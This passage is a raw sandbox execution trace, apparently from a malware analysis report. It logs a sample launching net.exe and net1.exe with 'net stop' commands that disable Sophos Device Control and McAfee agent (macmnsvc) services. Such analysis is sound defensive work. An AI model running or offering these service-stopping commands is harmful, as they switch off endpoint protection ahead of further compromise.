_MaxCount=0x12) returned 16 [0037.519] LocalFree (hMem=0x5b9880) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)颀[)") returned 0x26 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x1b [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)㾐[)") returned 0xbe [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0037.519] LocalFree (hMem=0x5b9880) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)颀[)") returned 0x33 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)㾐[)") returned 0xc1 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0037.519] LocalFree (hMem=0x5b9880) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)颀[)") returned 0x16 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x33 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)㾐[)") returned 0x234 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0037.519] LocalFree (hMem=0x5b9880) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)颀[)") returned 0x13 [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x16 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㶨[⡋瓢)㾐[)") returned 0x11 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3da8) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㶨[)") returned 0x14 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x12 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0xf [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x17 [0037.520] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0037.520] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.520] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x18 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0037.521] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x2a [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0037.521] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0037.521] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)㾐[)") returned 0x58 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0037.521] LocalFree (hMem=0x5bb880) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0x184 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0037.521] LocalFree (hMem=0x5bb880) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0xc7 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0037.521] LocalFree (hMem=0x5bb880) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0x47 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0037.521] LocalFree (hMem=0x5bb880) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0xc2 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0037.521] LocalFree (hMem=0x5bb880) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0x319 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0037.521] LocalFree (hMem=0x5bb880) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0x483 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0037.521] LocalFree (hMem=0x5bb880) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0xa86 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0037.521] LocalFree (hMem=0x5bb880) returned 0x0 [0037.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0x54 [0037.521] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0037.522] LocalFree (hMem=0x5bb880) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)뢀[)") returned 0xad [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0037.522] LocalFree (hMem=0x5bb880) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)뢀[)") returned 0x2e [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0037.522] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)㾐[)") returned 0x7d [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0037.522] LocalFree (hMem=0x5bb880) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)뢀[)") returned 0x26 [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0037.522] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0037.522] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x1b [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0037.522] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)㾐[)") returned 0xbe [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0037.522] LocalFree (hMem=0x5bb880) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)뢀[)") returned 0x33 [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0037.522] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0037.522] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)㾐[)") returned 0xc1 [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0037.522] LocalFree (hMem=0x5bb880) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)뢀[)") returned 0x16 [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0037.522] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x33 [0037.522] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0037.522] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.522] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="뢀[⡋瓢)㾐[)") returned 0x234 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0037.523] LocalFree (hMem=0x5bb880) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)뢀[)") returned 0x13 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x16 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㶨[⡋瓢)㾐[)") returned 0x11 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3da8) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㶨[)") returned 0x14 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x12 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0xf [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x17 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.523] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.523] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x18 [0037.523] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.524] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.524] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x2a [0037.524] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0037.524] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.524] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.524] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0037.524] GetFileType (hFile=0x26c) returned 0x3 [0037.524] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x29f7ec | out: lpMode=0x29f7ec) returned 0 [0037.524] GetConsoleOutputCP () returned 0x1b5 [0037.524] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0037.524] malloc (_Size=0x16) returned 0x882750 [0037.524] GetConsoleOutputCP () returned 0x1b5 [0037.524] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x882750, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0037.524] WriteFile (in: hFile=0x26c, lpBuffer=0x882750*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x29f7f0, lpOverlapped=0x0 | out: lpBuffer=0x882750*, lpNumberOfBytesWritten=0x29f7f0*=0x15, lpOverlapped=0x0) returned 1 [0037.524] free (_Block=0x882750) [0037.524] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.525] NetApiBufferFree (Buffer=0x5b1cb8) returned 0x0 [0037.525] NetApiBufferFree (Buffer=0x5b1cd0) returned 0x0 [0037.525] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Device Control ServiceΓÇ¥ /y" [0037.525] exit (_Code=1) Process: id = "21" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x49d0a000" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop macmnsvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 89 os_tid = 0xb58 Process: id = "22" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4a30d000" os_pid = "0xb5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xb54" cmd_line = "C:\\Windows\\system32\\net1 stop macmnsvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = 